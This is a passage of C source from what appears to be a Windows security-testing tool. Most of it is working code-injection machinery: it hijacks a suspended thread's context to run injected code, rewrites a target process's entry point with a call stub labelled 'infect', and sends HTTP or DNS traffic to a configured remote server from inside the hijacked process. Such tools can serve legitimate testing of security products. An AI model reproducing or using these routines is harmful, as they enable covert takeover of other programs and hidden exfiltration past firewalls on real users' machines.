   top-1: Process handle.
   top-2: Thread handle.
   top-3: Pointer to the universal structure in the target process.

 Stack output:
   top-1: Old context of the target thread.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_structure_start_set_context_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  HANDLE *pprocess=NULL,*pthread=NULL;
  void **pmem=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&pprocess,NULL)
   && univ->job_stack_pop(univ,job,(void*)&pthread,NULL)
   && univ->job_stack_pop(univ,job,(void*)&pmem,NULL))
  {
    HANDLE process=*pprocess;
    HANDLE thread=*pthread;
    void *mem=*pmem;
    void *main_ptr=(void*)((size_t)mem+univ->code_block_offset+(size_t)com_univ_main-(size_t)com_univ_code_block);

    DWORD srret=univ->kernel32.SuspendThread(thread);
    if (srret!=(DWORD)-1)
    {
      CONTEXT context,old_context;
      context.ContextFlags=CONTEXT_FULL;
      if (univ->kernel32.GetThreadContext(thread,&context))
      {
        com_univ_memcpy(&old_context,&context,sizeof(old_context));

        DWORD old_esp=context.Esp;
        DWORD old_eip=context.Eip;

        // push pointer to argument and insert call-ret on the stack
        context.Eip=(DWORD)main_ptr;
        context.Esp=old_esp-2*sizeof(void*);

        void *new_vals[2]={(void*)old_eip,mem};

        if (univ->kernel32.WriteProcessMemory(process,(void*)(old_esp-8),new_vals,sizeof(new_vals),NULL))
        {
          if (univ->kernel32.SetThreadContext(thread,&context))
          {
            do
            {
              srret=univ->kernel32.ResumeThread(thread);
            } while ((srret!=(DWORD)-1) && !srret && (srret!=1));

            if (!srret || (srret==1))
            {
              res=univ->job_stack_push(univ,job,&old_context,sizeof(old_context));
            } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_START_SET_CONTEXT_THREAD_RESUME_THREAD);
          } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_START_SET_CONTEXT_THREAD_SET_THREAD_CONTEXT);
        } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_START_SET_CONTEXT_THREAD_WRITE_PROCESS_MEMORY);
      } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_START_SET_CONTEXT_THREAD_GET_THREAD_CONTEXT);
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_START_SET_CONTEXT_THREAD_SUSPEND_THREAD);
  }

  return res;
}


/*
 Restores the original context of the target and resumes it.
 This function assumes that the target thread is already suspended.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Thread handle.
   top-2: Old context of the target thread.

 Stack output:
   Empty.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_structure_cleanup_set_context_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  HANDLE *pthread=NULL;
  CONTEXT *context=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&pthread,NULL)
   && univ->job_stack_pop(univ,job,(void*)&context,NULL))
  {
    HANDLE thread=*pthread;

    if (univ->kernel32.SetThreadContext(thread,context))
    {
      int attempts=5;
      DWORD srret;
      do
      {
        srret=univ->kernel32.ResumeThread(thread);
        if (!srret)
        {
          attempts--;
          univ->kernel32.Sleep(10);
        }
      } while ((srret!=(DWORD)-1) && (attempts>0) && (srret!=1));

      if (!srret || (srret==1))
      {
        res=TRUE;
      } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_CLEANUP_SET_CONTEXT_THREAD_RESUME_THREAD);
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_STRUCTURE_CLEANUP_SET_CONTEXT_THREAD_SET_THREAD_CONTEXT);
  }

  return res;
}





/*
 Rewrites the image entry point of the target process.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Pointer to the universal structure in the target process.
   top-2: Process handle.
   top-3: Target process image information (COM_IMAGE_INFO).

 Stack output:
   Empty.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_infect_rewrite_entry(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  void **pmem=NULL;
  COM_IMAGE_INFO *info=NULL;
  HANDLE *pprocess=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&pmem,NULL)
   && univ->job_stack_pop(univ,job,(void*)&pprocess,NULL)
   && univ->job_stack_pop(univ,job,(void*)&info,NULL))
  {
    void* mem=*pmem;
    HANDLE process=*pprocess;
    char infection_call_buffer[1+5+5+1];        // nop, push, call, ret
    size_t infection_call_size=sizeof(infection_call_buffer);

    infection_call_buffer[0]=COM_INSTR_IA32_NOP;
//    infection_call_buffer[0]=COM_INSTR_IA32_INT3;

    // push PCOM_UNIV
    infection_call_buffer[1]=COM_INSTR_IA32_PUSH;
    *((void**)&infection_call_buffer[2])=mem;

    // call com_univ_main()
    infection_call_buffer[6]=COM_INSTR_IA32_CALL;
    *((DWORD*)&infection_call_buffer[7])=(size_t)mem+univ->code_block_offset                  // address of the universal structure
                                        +(size_t)com_univ_main-(size_t)com_univ_code_block    // + offset of com_univ_main
                                        -((DWORD)info->entry_point+6)-5;                      // - relative call instruction

    // ret
    infection_call_buffer[11]=COM_INSTR_IA32_RET;

    res=univ->kernel32.WriteProcessMemory(process,info->entry_point,infection_call_buffer,infection_call_size,NULL);
    if (!res) com_univ_err_set(univ,job->index,COM_UNIV_ERR_INFECT_REWRITE_ENTRY_WRITE_PROCESS_MEMORY);
  }

  return res;
}



/*
 Suspends the current thread.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Usually, does not return until the thread is resumed.
 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_suspend_current_thread(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  res=univ->kernel32.SuspendThread(COM_HANDLE_CURRENT_THREAD);
  if (res==-1) com_univ_err_set(univ,job->index,COM_UNIV_ERR_SUSPEND_CURRENT_THREAD);

  return res;
}

/*
 Opens the mapping created by server process.
 The mapping should be destroyed using com_univ_client_finit() when it is no more needed.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_client_init(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;
  HANDLE event=univ->kernel32.OpenEventA(EVENT_ALL_ACCESS,FALSE,univ->mapping_event_name);
  if (event)
  {
    HANDLE mapping=univ->kernel32.OpenFileMappingA(FILE_MAP_ALL_ACCESS,FALSE,univ->mapping_name);
    if (mapping)
    {
      PCOM_UNIV_DATA data=univ->kernel32.MapViewOfFile(mapping,FILE_MAP_READ | FILE_MAP_WRITE,0,0,COM_MAP_DEFAULT_DATA_SIZE_MAX);
      if (data)
      {
        univ->server_mapping.event=event;
        univ->server_mapping.mapping=mapping;
        univ->server_mapping.data=data;
        res=TRUE;

        if (!res) univ->kernel32.UnmapViewOfFile(data);
      } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_CLIENT_INIT_MAP_VIEW_OF_FILE);

      if (!res) univ->kernel32.CloseHandle(mapping);
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_CLIENT_INIT_OPEN_FILE_MAPPING);


    if (!res) univ->kernel32.CloseHandle(event);
  } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_CLIENT_INIT_OPEN_EVENT);
  return res;
}


/*
 Closes the mapping opened by com_univ_client_finit.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 The function returns TRUE.
*/

int WINAPI com_univ_client_finit(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  univ->kernel32.UnmapViewOfFile(univ->server_mapping.data);
  univ->kernel32.CloseHandle(univ->server_mapping.mapping);
  univ->kernel32.CloseHandle(univ->server_mapping.event);
  return TRUE;
}


/*
 Copies the universal error information to the mapping and sets mapping event and thus signals that the client's data is ready.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_client_send_result(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  com_univ_memcpy(&univ->server_mapping.data->error,&univ->error,sizeof(univ->server_mapping.data->error));

  int res=univ->kernel32.SetEvent(univ->server_mapping.event);

  if (!res) com_univ_err_set(univ,job->index,COM_UNIV_ERR_CLIENT_SEND_RESULT_SET_EVENT);

  return res;
}


/*
 If an error occurred, copies the universal error information to the mapping and sets mapping event
 and thus signals that the client's data is ready.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_client_send_result_error(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=TRUE;
  if (univ->error.occurred)
  {
    com_univ_memcpy(&univ->server_mapping.data->error,&univ->error,sizeof(univ->server_mapping.data->error));

    res=univ->kernel32.SetEvent(univ->server_mapping.event);

    if (!res) com_univ_err_set(univ,job->index,COM_UNIV_ERR_CLIENT_SEND_RESULT_ERROR_SET_EVENT);
  }

  return res;
}


/*
 Waits for server mapping and process or thread handle.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: The process or thread handle to wait for.

 Stack output:
   Empty.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_wait_mapping_event_handle(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  HANDLE *phandle=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&phandle,NULL))
  {
    HANDLE handle=*phandle;
    HANDLE handles[2]={univ->server_mapping.event,handle};
    DWORD wres=univ->kernel32.WaitForMultipleObjects(2,handles,FALSE,20000);
    switch (wres)
    {
      case WAIT_OBJECT_0:
      {
        res=!univ->server_mapping.data->error.occurred;
        if (!res)
        {
          univ->error.occurred=univ->server_mapping.data->error.occurred;
          univ->error.code_system=univ->server_mapping.data->error.code_system;
          univ->error.code=univ->server_mapping.data->error.code;
          univ->error.job_index=univ->server_mapping.data->error.job_index;
        }
        break;
      }

      case WAIT_OBJECT_0+1:
        com_univ_err_set_nc(univ,job->index,COM_UNIV_ERR_WAIT_MAPPING_EVENT_HANDLE_TERMINATED);
        break;

      case WAIT_TIMEOUT:
        com_univ_err_set_nc(univ,job->index,COM_UNIV_ERR_WAIT_MAPPING_EVENT_HANDLE_TIMEOUT);
        break;

      default:
        if (wres!=WAIT_FAILED) com_univ_err_set_nc(univ,job->index,COM_UNIV_ERR_WAIT_MAPPING_EVENT_HANDLE_WAITING_FAILED);
        else com_univ_err_set(univ,job->index,COM_UNIV_ERR_WAIT_MAPPING_EVENT_HANDLE_WAITING_FAILED);
    }
  }

  return res;
}



/*
 Calls com_univ_server_init_external(). For description see com_univ_server_init_external().
*/

int WINAPI com_univ_server_init(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  return com_univ_external_call(com_univ_server_init_external,univ,job);
}


/*
 Calls com_univ_server_finit_external(). For description see com_univ_server_finit_external().
*/

int WINAPI com_univ_server_finit(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  return com_univ_external_call(com_univ_server_finit_external,univ,job);
}


/*
 Performs an attempt to send data to the Internet server and to receive an answer.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Information about the server (struct sockaddr_in).
   top-2: A length of the data.
   top-3: The data to send to the server.

 Stack output:
   Empty.


 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_inet_sock_http(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  struct sockaddr_in *server=NULL;
  size_t *pdata_len=NULL;
  char *data=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&server,NULL)
   && univ->job_stack_pop(univ,job,(void*)&pdata_len,NULL)
   && univ->job_stack_pop(univ,job,(void*)&data,NULL))
  {
    size_t data_len=*pdata_len;
    WSADATA wsadata;
    int ret=univ->ws2_32.WSAStartup(MAKEWORD(1,1),&wsadata);
    if (ret==0)
    {
      SOCKET s=univ->ws2_32.socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
      if (s!=INVALID_SOCKET)
      {
        ret=univ->ws2_32.connect(s,(SOCKADDR*)server,sizeof(struct sockaddr_in));
        if (ret!=SOCKET_ERROR)
        {
          ret=univ->ws2_32.send(s,data,data_len,0);

          if (ret!=SOCKET_ERROR)
          {
            int totlen=0;
            char *buf=univ->server_mapping.data->buffer;
            size_t buflen=sizeof(univ->server_mapping.data->buffer);
            while ((totlen<buflen) && (ret!=SOCKET_ERROR) && (ret!=0))
            {
              int timeout=1500;
              unsigned long pending=0;
              ret=univ->ws2_32.ioctlsocket(s,FIONREAD,&pending);
              if (ret!=SOCKET_ERROR)
              {
                ret=1;
                if (pending==0)
                {
                  fd_set rset;
                  FD_ZERO(&rset);
                  FD_SET(s,&rset);
                  struct timeval tv={timeout/1000,1000*(timeout%1000)};

                  ret=univ->ws2_32.select(1,&rset,NULL,NULL,&tv);
                  if (ret==SOCKET_ERROR) com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_HTTP_SELECT);
                }

                if (ret!=0)
                {
                  ret=univ->ws2_32.recv(s,&buf[totlen],buflen-totlen,0);
                  if (ret==SOCKET_ERROR) com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_HTTP_RECV);
                  else totlen+=ret;
                }
              } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_HTTP_IOCTLSOCKET);
            }

            if (totlen==buflen) totlen--;
            buf[totlen]='\0';

            res=totlen>0;

          } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_HTTP_SEND);
        } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_HTTP_CONNECT);

        univ->ws2_32.closesocket(s);
      } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_HTTP_SOCKET);

      univ->ws2_32.WSACleanup();
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_HTTP_WSASTARTUP);
  }

  return res;
}


/*
 Performs an attempt to send DNS query to the Internet server on port 53/UDP and to receive an answer.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: Information about the server (struct sockaddr_in).
   top-2: A length of the query.
   top-3: The query to send to the server.

 Stack output:
   Empty.


 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_inet_sock_dns(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  struct sockaddr_in *server=NULL;
  size_t *pdata_len=NULL;
  char *data=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&server,NULL)
   && univ->job_stack_pop(univ,job,(void*)&pdata_len,NULL)
   && univ->job_stack_pop(univ,job,(void*)&data,NULL))
  {
    size_t data_len=*pdata_len;
    WSADATA wsadata;
    int ret=univ->ws2_32.WSAStartup(MAKEWORD(1,1),&wsadata);
    if (ret==0)
    {
      SOCKET s=univ->ws2_32.socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP);
      if (s!=INVALID_SOCKET)
      {
        ret=univ->ws2_32.sendto(s,data,data_len,0,(struct sockaddr *)server,sizeof(struct sockaddr_in));
        if (ret!=SOCKET_ERROR)
        {
          fd_set read_set;
          FD_ZERO(&read_set);
          FD_SET(s,&read_set);

          struct timeval tv={5,0};

          ret=univ->ws2_32.select(1,&read_set,NULL,NULL,&tv);
          if (ret!=SOCKET_ERROR)
          {
            struct sockaddr from_addr;
            int from_len=sizeof(from_addr);
            ret=univ->ws2_32.recvfrom(s,&univ->server_mapping.data->buffer[sizeof(int)],
                                      sizeof(univ->server_mapping.data->buffer)-sizeof(int),0,&from_addr,&from_len);
            if (ret!=SOCKET_ERROR)
            {
              *(int*)(&univ->server_mapping.data->buffer[0])=ret;
              res=TRUE;
            } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_DNS_RECVFROM);
          } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_DNS_SELECT);
        } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_DNS_SENDTO);

        univ->ws2_32.closesocket(s);
      } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_DNS_SOCKET);

      univ->ws2_32.WSACleanup();
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_INET_SOCK_DNS_WSASTARTUP);
  }

  return res;
}


/*
 Terminates process.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 Stack input:
   top-1: A handle to the process to terminate.

 Stack output:
   Empty.


 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int WINAPI com_univ_terminate_process(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  HANDLE *pprocess=NULL;
  if (univ->job_stack_pop(univ,job,(void*)&pprocess,NULL))
  {
    HANDLE process=*pprocess;

    if (univ->kernel32.TerminateProcess(process,0)) res=TRUE;
    else com_univ_err_set(univ,job->index,COM_UNIV_ERR_TERMINATE_PROCESS_TERMINATE_PROCESS);
  }

  return res;
}



/*
 Main universal function code.

 'univ' A pointer to the universal structure.

 The return value is the index of the last successful action.
 -1 indicates that not even the first action was successful.
 -2 indicates that not even the initialization before starting actions was successful.
*/

DWORD WINAPI com_univ_main(PCOM_UNIV univ)
{
  if (!com_univ_fix_func_kernel(univ)) return -2;
  PCOM_UNIV_JOB job=com_univ_job_get(univ);
  job->offset_base=(void*)((size_t)univ+univ->code_block_offset);

  univ->job_stack_push=(COM_UNIV_JOB_STACK_PUSH)((size_t)job->offset_base+(size_t)com_univ_job_stack_push-(size_t)com_univ_code_block);
  univ->job_stack_pop=(COM_UNIV_JOB_STACK_POP)((size_t)job->offset_base+(size_t)com_univ_job_stack_pop-(size_t)com_univ_code_block);
  univ->job_stack_get=(COM_UNIV_JOB_STACK_GET)((size_t)job->offset_base+(size_t)com_univ_job_stack_get-(size_t)com_univ_code_block);

  univ->job_index++;


  int failure=FALSE;
  int last_successful=-1;
  for (int i=0;i<job->actions_count;i++)
  {
    PCOM_UNIV_ACTION action=&job->actions[i];

    int ret=FALSE;
    if (action->argument_present)
    {
      COM_UNIV_ACTION_FUNC_ARG func=(COM_UNIV_ACTION_FUNC_ARG)((size_t)job->offset_base+action->func_offset);
      if (action->min_index<=last_successful) ret=func(univ,job,action->argument);
    } else
    {
      COM_UNIV_ACTION_FUNC func=(COM_UNIV_ACTION_FUNC)((size_t)job->offset_base+action->func_offset);
      if (action->min_index<=last_successful) ret=func(univ,job);
    }

    if (!ret) failure=TRUE;
    if (!failure) last_successful=i;
  }

  return last_successful;
}


void com_univ_code_block_end(void) {};


/*
 Pushes an item on the stack after the job's initialization.
 This function assumes that the caller fully controls the stack and its size
 and so that no error should occur.

 'job' A pointer to the universal job.
 'item_data' A stack item to push on the stack.
 'item_size' A size of the item in bytes.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int com_univ_job_stack_init_push(PCOM_UNIV_JOB job,void *item_data,size_t item_size)
{
  return com_univ_job_stack_push(NULL,job,item_data,item_size);
}



/*
 Universal server functions.
 These functions are called in the context of the testing program.
*/

/*
 Creates a file mapping and a synchronization event.
 The mapping should be destroyed using com_univ_server_finit_external() when it is no more needed.

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 If the function succeeds the return value is TRUE, otherwise it is FALSE.
*/

int com_univ_server_init_external(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  int res=FALSE;

  HANDLE event=CreateEventA(NULL,FALSE,FALSE,univ->mapping_event_name);
  if (event)
  {
    HANDLE mapping=CreateFileMappingA(INVALID_HANDLE_VALUE,NULL,PAGE_READWRITE,0,COM_MAP_DEFAULT_DATA_SIZE_MAX,univ->mapping_name);
    if (mapping)
    {
      PCOM_UNIV_DATA data=MapViewOfFile(mapping,FILE_MAP_READ | FILE_MAP_WRITE,0,0,COM_MAP_DEFAULT_DATA_SIZE_MAX);
      if (data)
      {
        memset(data,0,COM_MAP_DEFAULT_DATA_SIZE_MAX);
        univ->server_mapping.event=event;
        univ->server_mapping.mapping=mapping;
        univ->server_mapping.data=data;

        res=TRUE;

        if (!res) UnmapViewOfFile(data);
      } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_SERVER_INIT_MAP_VIEW_OF_FILE);

      if (!res) CloseHandle(mapping);
    } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_SERVER_INIT_CREATE_FILE_MAPPING);

    if (!res) CloseHandle(event);
  } else com_univ_err_set(univ,job->index,COM_UNIV_ERR_SERVER_INIT_CREATE_EVENT);

  return res;
}


/*
 Destroys file mapping and a synchronization event created by com_univ_server_init_external().

 'univ' A pointer to the universal structure.
 'job' A pointer to the universal job.

 The function returns TRUE.
*/

int com_univ_server_finit_external(PCOM_UNIV univ,PCOM_UNIV_JOB job)
{
  UnmapViewOfFile(univ->server_mapping.data);
  CloseHandle(univ->server_mapping.mapping);
  CloseHandle(univ->server_mapping.event);
  return TRUE;
}


/*
 Initializes host and data structures to be used in com_univ_inet_sock_http().

 'host' A pointer to a structure that is filled with the host information.
 'data' A pointer to a null terminated string that contains encoded data to send.
 'len' A length of 'data' buffer in bytes.
 'conf' A pointer to a structure with the loaded configuration.
*/

void com_univ_inet_sock_http_init(struct sockaddr_in *host,char *data,size_t len,PCOM_CONF conf)
{
  memset(host,0,sizeof(host));
  host->sin_family=AF_INET;
  host->sin_port=htons(conf->port);
  host->sin_addr.s_addr=conf->ip.s_addr;

  snprintf(data,len,"GET %s%s%s HTTP/1.1\nHost: %s\n\n",conf->url,conf->delim,conf->data64,conf->host);
  data[len-1]='\0';

  return;
}

/*
 This function fills a common error information from an universal error information.

 'univ' A pointer to a variable that receives a pointer to a newly allocated universal structure.
 'err_inf' A pointer to a structure that will be filled with an error message and a code if an error occurs.
*/

void com_univ_server_err_report(PCOM_UNIV univ,PCOM_ERROR err_inf)
{
  if (!univ->error.occurred) return;

  DWORD code=univ->error.code_system;

  switch (univ->error.code)
  {
    case COM_UNIV_ERR_FIX_FUNC_KERNEL_GET_BASE: com_err_set_sc(err_inf,code,"[com_univ_fix_func_kernel()] Unable to find \"kernel32.dll\".\n"); break;
    case COM_UNIV_ERR_LOAD_SECOND_DLL_INVALID_DLL_NAME: com_err_set_sc(err_inf,code,"[com_univ_load_second_dll()] \"%s\" is not a valid name of the second DLL.\n",univ->second_dll_name); break;
    case COM_UNIV_ERR_LOAD_SECOND_DLL_LOAD_LIBRARY: com_err_set_sc(err_inf,code,"[com_univ_load_second_dll()] Unable to load library \"%s\".\n",univ->second_dll_name); break;
    case COM_UNIV_ERR_JOB_STACK_PUSH_STACK_FULL: com_err_set_sc(err_inf,code,"[com_univ_job_stack_push()] The job's stack is full.\n"); break;
    case COM_UNIV_ERR_JOB_STACK_POP_STACK_EMPTY: com_err_set_sc(err_inf,code,"[com_univ_job_stack_pop()] The job's stack is empty.\n"); break;
    case COM_UNIV_ERR_JOB_STACK_GET_INDEX_INVALID: com_err_set_sc(err_inf,code,"[com_univ_job_stack_get()] The stack item index is invalid.\n"); break;
    case COM_UNIV_ERR_SERVER_INIT_CREATE_EVENT: com_err_set_sc(err_inf,code,"[com_univ_server_init()] Unable to create event \"%s\".\n",univ->mapping_event_name); break;
    case COM_UNIV_ERR_SERVER_INIT_CREATE_FILE_MAPPING: com_err_set_sc(err_inf,code,"[com_univ_server_init()] Unable to create file mapping \"%s\".\n",univ->mapping_name); break;
    case COM_UNIV_ERR_SERVER_INIT_MAP_VIEW_OF_FILE: com_err_set_sc(err_inf,code,"[com_univ_server_init()] Unable to map view of \"%s\" file mapping.\n",univ->mapping_name); break;
    case COM_UNIV_ERR_HANDLE_OBTAIN_CREATE_PROCESS_CREATE_PROCESS: com_err_set_sc(err_inf,code,"[com_univ_handle_obtain_create_process()] Unable to create child process.\n"); break;
    case COM_UNIV_ERR_HANDLE_OBTAIN_OPEN_PROCESS_OPEN_PROCESS: com_err_set_sc(err_inf,code,"[com_univ_handle_obtain_open_process()] Unable to open the process.\n"); break;
    case COM_UNIV_ERR_HANDLE_OBTAIN_OPEN_THREAD_OPEN_THREAD: com_err_set_sc(err_inf,code,"[com_univ_handle_obtain_open_thread()] Unable to open the thread.\n"); break;
    case COM_UNIV_ERR_STRUCTURE_ALLOC_WRITE_VIRTUAL_ALLOC_EX: com_err_set_sc(err_inf,code,"[com_univ_structure_alloc_write()] Unable to allocate %d bytes of memory in the target process.\n",univ->size); break;
    case COM_UNIV_ERR_STRUCTURE_ALLOC_WRITE_WRITE_PROCESS_MEMORY: com_err_set_sc(err_inf,code,"[com_univ_structure_alloc_write()] Unable to write %d bytes to the allocated memory in the target process.\n",univ->size); break;
    case COM_UNIV_ERR_STRUCTURE_START_RESUME_THREAD_RESUME_THREAD: com_err_set_sc(err_inf,code,"[com_univ_structure_start_resume_thread()] Unable to resume the thread.\n"); break;
    case COM_UNIV_ERR_STRUCTURE_START_CREATE_REMOTE_THREAD_CREATE_REMOTE_THREAD: com_err_set_sc(err_inf,code,"[com_univ_structure_start_create_remote_thread()] Unable to create remote thread.\n"); break;
    case COM_UNIV_ERR_STRUCTURE_START_SET_CONTEXT_THREAD_SUSPEND_THREAD: com_err_set_sc(err_inf,code,"[com_univ_structure_start_set_context_thread()] Unable to suspend the target thread.\n"); break;
    case COM_UNIV_ERR_STRUCTURE_START_SET_CONTEXT_THREAD_GET_THREAD_CONTEXT: com_err_set_sc(err_inf,code,"[com_univ_structure_start_set_context_thread()] Unable to get context of the target thread.\n"); break;
    case COM_UNIV_ERR_STRUCTURE_START_SET_CONTEXT_THREAD_WRITE_PROCESS_MEMORY: com_err_set_sc(err_inf,code,"[com_univ_structure_start_set_context_thread()] Unable to write data to the memory of the target process.\n"); break;
    case COM_UNIV_ERR_STRUCTURE_START_SET_CONTEXT_THREAD_SET_THREAD_CONTEXT: com_err_set_sc(err_inf,code,"[com_univ_structure_start_set_context_thread()] Unable to set context of the target thread.\n"); break;
    case COM_UNIV_ERR_STRUCTURE_START_SET_CONTEXT_THREAD_RESUME_THREAD: com_err_set_sc(err_inf,code,"[com_univ_structure_start_set_context_thread()] Unable to resume the target thread.\n"); break;
    case COM_UNIV_ERR_STRUCTURE_CLEANUP_SET_CONTEXT_THREAD_SET_THREAD_CONTEXT: com_err_set_sc(err_inf,code,"[com_univ_structure_cleanup_set_context_thread()] Unable to restore context of the target thread.\n"); break;
    case COM_UNIV_ERR_STRUCTURE_CLEANUP_SET_CONTEXT_THREAD_RESUME_THREAD: com_err_set_sc(err_inf,code,"[com_univ_structure_cleanup_set_context_thread()] Unable to resume the target thread.\n"); break;
    case COM_UNIV_ERR_INFECT_REWRITE_ENTRY_WRITE_PROCESS_MEMORY: com_err_set_sc(err_inf,code,"[com_univ_infect_rewrite_entry()] Unable to rewrite 12 bytes at the target process entry point.\n"); break;
    case COM_UNIV_ERR_CLIENT_INIT_OPEN_EVENT: com_err_set_sc(err_inf,code,"[com_univ_client_init()] Unable to open event \"%s\".\n",univ->mapping_event_name); break;
    case COM_UNIV_ERR_CLIENT_INIT_OPEN_FILE_MAPPING: com_err_set_sc(err_inf,code,"[com_univ_client_init()] Unable to open file mapping \"%s\".\n",univ->mapping_name); break;
    case COM_UNIV_ERR_CLIENT_INIT_MAP_VIEW_OF_FILE: com_err_set_sc(err_inf,code,"[com_univ_client_init()] Unable to map view of \"%s\" file mapping.\n",univ->mapping_name); break;
    case COM_UNIV_ERR_CLIENT_SEND_RESULT_SET_EVENT: com_err_set_sc(err_inf,code,"[com_univ_client_send_result()] Unable to set event \"%s\".\n",univ->mapping_event_name); break;
    case COM_UNIV_ERR_CLIENT_SEND_RESULT_ERROR_SET_EVENT: com_err_set_sc(err_inf,code,"[com_univ_client_send_result_error()] Unable to set event \"%s\".\n",univ->mapping_event_name); break;
    case COM_UNIV_ERR_WAIT_MAPPING_EVENT_HANDLE_TERMINATED: com_err_set_sc(err_inf,code,"[com_univ_wait_mapping_event_handle()] The target process or thread has been terminated.\n"); break;
    case COM_UNIV_ERR_WAIT_MAPPING_EVENT_HANDLE_TIMEOUT: com_err_set_sc(err_inf,code,"[com_univ_wait_mapping_event_handle()] Waiting for the signal timed out.\n"); break;
    case COM_UNIV_ERR_WAIT_MAPPING_EVENT_HANDLE_WAITING_FAILED: com_err_set_sc(err_inf,code,"[com_univ_wait_mapping_event_handle()] Waiting for the signal failed.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_HTTP_WSASTARTUP: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_http()] Unable to initialize Windows sockets.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_HTTP_SOCKET: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_http()] Unable to create TCP socket.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_HTTP_CONNECT: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_http()] Unable to connect to the Internet server.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_HTTP_SEND: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_http()] Unable to send data to the Internet server.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_HTTP_IOCTLSOCKET: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_http()] Unable to get information from the socket.\n"); break;
    case COM_UNIV_ERR_INET_SOCK_HTTP_SELECT: com_err_set_sc(err_inf,code,"[com_univ_inet_sock_http()] Unable to wait for the data from the Internet server.\n"); break;
